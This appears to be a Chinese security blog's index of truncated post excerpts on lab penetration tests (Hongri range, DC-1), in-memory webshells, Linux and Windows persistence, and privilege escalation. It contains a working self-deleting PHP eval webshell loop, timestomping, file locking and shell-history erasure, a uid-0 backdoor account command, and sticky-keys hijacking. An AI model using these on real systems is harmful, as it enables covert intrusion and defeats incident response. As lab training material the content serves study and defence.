红日靶场红日1搭建下载
下下来解压
拓扑图:
VM启动
靶场默认密码hongrisec@2019
打开靶机
win7 开phpstudy
ip:
win7(web服务器) 10.4.7.205 192.168.52.130
win2008(域控) 192.168.52.138
win2003(域主机) 192.168.52.141
要给win7配双网卡
攻击外网扫描一下
nmap -sS -sV -Pn 10.4.7.205
开放445可能有永恒之蓝漏洞
3306对应mysal
3389远程桌面连接
dirsearch也扫下吧
dirsearch -u http://10.4.7.205
我们访问一下这个phpMyAdmin
一个登录接口
尝试mysql常用账号密码登录
最后发现账号密码是root root
登录
到变量这里查看
查看数据库是否可以写入–sucure_file_priv是否为null
查询之后为NULL,所以不能写入
不行的话我们就试下日志马
日志马先看下有没有权限
查这个–general_log
off也无所谓 我们可以改
SET GLOB ...
DC靶场DC-1环境配置DC-1
vm打开解压的DC-1.ova
输入虚拟机名称和选择存储路径,点击导入,一般会弹出导入失败的对话框,不用理,直接点击重试。导入完成之后,先不要着急开机
然后配置一下网络
跟kali配成一样的
然后就打开kali和DC1
DC-1打开是这样的:
我们渗透的目的就是等进去
攻击上线nmap参数
先扫描一下 确定一下ip和port
nmap -sP 192.168.49.1/24
发现有三台主机
进一步扫码呢
nmap -PS -PA 192.168.49.1/24
判断目标主机是192.168.49.129
开放端口是22 80 111
22是ssh服务,80是http,111是一个rpcbind远程调用
访问一下这个ip呢
是一个登录界面
搜索Drupal 发现是一个CMS
Drupal 7
直接上MSF
msfdb run
search Drupal 7
发现有漏洞框架
用0
只用设置rhost
set rhost 192.168.49.129
但是没用 换一个框架呢
use1
同样的去设置rhost
咦都不行
扫描一下呢
没有 ...
web权限维持介绍webshell内存马是把木马和后门写在内存中 然后去执行 达到webshell
可以加强攻击的隐蔽性和排查难度
java内存马相关文章
前置java在进行web服务时 有三大件开启
启动的顺序为listener->Filter->servlet
Servlet 是运行在 Web 服务器或应用服务器上的程序,作为来自 HTTP 客户端的请求和 HTTP 服务器上的数据库或应用程序之间的中间层,负责处理用户的请求,并根据请求生成相应的返回信息提供给用户。
Filter,过滤器,是对Servlet技术的一个强补充,其主要功能是
在HttpServletRequest到达 Servlet 之前,拦截客户的HttpServletRequest ,根据需要检查HttpServletRequest,也可以修改HttpServletRequest 头和数据
在HttpServletResponse到达客户端之前,拦截HttpServletResponse ,根据需要检查HttpServletResponse,也可以修改HttpServletResponse头和数 ...
web权限维持介绍webshell内存马是把木马和后门写在内存中 然后去执行 达到webshell
可以加强攻击的隐蔽性和排查难度
python内存马前置常用的Python框架有Django、Flask, 这两者都可能存在SSTI漏洞. Python 内存马利用Flask框架中SSTI注入来实现, Flask框架中在web应用模板渲染的过程中用到render_template_string进行渲染, 但未对用户传输的代码进行过滤导致用户可以通过注入恶意代码来实现Python内存马的注入.
当网页请求进入Flask时, 会实例化一个Request Context. 在Python中分出了两种上下文: 请求上下文(request context)、应用上下文(session context). 一个请求上下文中封装了请求的信息, 而上下文的结构是运用了一个Stack的栈结构, 也就是说它拥有一个栈所拥有的全部特性. request context实例化后会被push到栈_request_ctx_stack中, 基于此特性便可以通过获取栈顶元素的方法来获取当前的请求.
环境
攻击马:
ht ...
web权限维持介绍webshell内存马是把木马和后门写在内存中 然后去执行 达到webshell
可以加强攻击的隐蔽性和排查难度
php内存马<?phpignore_user_abort(true);set_time_limit(0);@unlink(__FILE__);$file = '.HH.php';$code = '<?php @eval($_POST[\'c\']); ?>';while (1){ file_put_contents($file,$code); usleep(5000);}?>
ignore_user_abort(true);
这条语句的作用是告诉PHP,即使客户端(如浏览器)中断了连接,脚本也应该继续执行。这通常用于需要长时间运行且不需要用户持续交互的脚本。
set_time_limit(0);
通过设置脚本执行时间为0,这告诉PHP取消脚本执行时间的限制。这意味着脚本可以无限期地运行,直到被外部干预(如服务器配置限制、系统资源耗尽等)停止。
@ ...
权限维持linux权限维持木马修改时间touch -r 目标文件 木马文件
将木马的时间修改成与另一个文件的时间相同 这样可能让受害者排查木马时忽略木马
touch -r ex10 shell.php
文件锁定为了防止用户误删除的操作
chattr +i 锁定
chattr -i 解锁
lsattr shell.php 看锁定状态
历史记录隐藏我们再linnux中执行的所有命令都会被记录下来
history
所以我们需要清除我们的攻击记录
隐藏接下来的命令记录
空格 set +o history
恢复
空格 set -o history
但是
空格 set +o history
仍被记录
所以
history -d 行号
history -d 104
已隐藏
隐藏文件我们可以用touch创建隐藏文件
touch .文件名 创建隐藏文件
ls -al 查看隐藏文件
添加用户#添加账号test,设置uid为0,密码为123456
useradd -p openssl passwd -1 -salt 'salt' 123456 t ...
权限维持window权限维持前置当我们拿到权限以后 不可避免的会遇到目标主机可能会关机 重启 应急排查等 让我们的权限失效 这时候我们就需要进行权限维持 长久的对目标进行控制
辅助功能进行劫持辅助功能提供了其他选项(屏幕键盘、放大镜、屏幕阅读),可以帮助人更轻松地使用Windows操作系统,但是此功能可能会被滥用
屏幕键盘: c:\windows\system32\osk.exe
放大镜: c:\windows\system32\Mageify.exe
粘滞键: c:\windows\system32\sethc.exe
旁白:C:\Windows\System32\Narrator.exe
显示切换器 C:\Windows\System32\DisplaySwitch.exe
应用切换器:C:\Windows\System32\AtBroker.exe
这些辅助功能说到底还是exe可执行程序
如果我们将这个可执行程序修改成我们的木马或者cmd呢
5下shift可以触发粘滞键
这意味着我们可以在未登录的情况下执行我们想执行的命令(shift后门 )
如果我们直接重命名辅助 ...
权限提升数据库提权如果内核提权没效果的情况下,采取数据库提权
前提条件:服务器开启数据库服务并且我们要获取到最高权限的用户密码
账号
mysql:root
mssql:sa
Oracle:xxx
获取密码
SQL注入点–>sqlmap 数据库就会存放最高权限用户的账密
数据库的存储文件或备份文件获取
网站应用的配置文件获取
工具、脚本爆破(需要解决外联问题)
远程爆破
本地爆破
sqlmap就不打了
数据库存放我们先用哥斯拉连上靶机
生成木马
把木马放到靶机上
哥斯拉连接一下
进入
找到phpstudy中的data目录
data文件夹下就是mysql的表、库
每一个文件对应一个数据库
进到mysql数据库中
.MYD文件中就存放了账号密码
找到
打开
password看的很清楚
mysql是通过md5加密的
解密一下
解密网站
存储文件与备份文件
配置文件中也存在
爆破远程爆破爆破需要开启数据库外连
开启数据库外联命令:
mysql> use mysql; –打开数据库
mysql> GRANT ALL PRIVILEGES O ...
权限提升Linux提权一键配环境
f8x集成环境
提权信息收集信息收集脚本1
LinEnum
把文件上传到目标服务器内
解压
绿色的表示有执行权限
可以按照参数来执行命令
也可以这样:
./LinEnum.sh >> 1.txt
把收集到的信息重定向到1.txt
收集成功
信息收集脚本2
linuxprivchecker-master
这个脚本需要目标主机有python环境
看到有py文件
同样的
python linuxprivchecker.py >> 2.txt
收集成功
内核提权提权流程我们先看下这个命令
uname -r
3.10.0-1160.el7.x86_64
3–>内核版本
10–>稳定版(技术开发版 偶数稳定版)
0–>补丁修补次数 这里是0次
后面的是具体详情
linux内核提权和windows的很像
需要漏洞
漏洞探测
把文件传到目标主机上
看到有可执行文件
同样的 运行脚本
./linux-exploit-suggester.sh
看到很多漏洞可以利用
Details:漏洞详情 参考连接
Exp ...
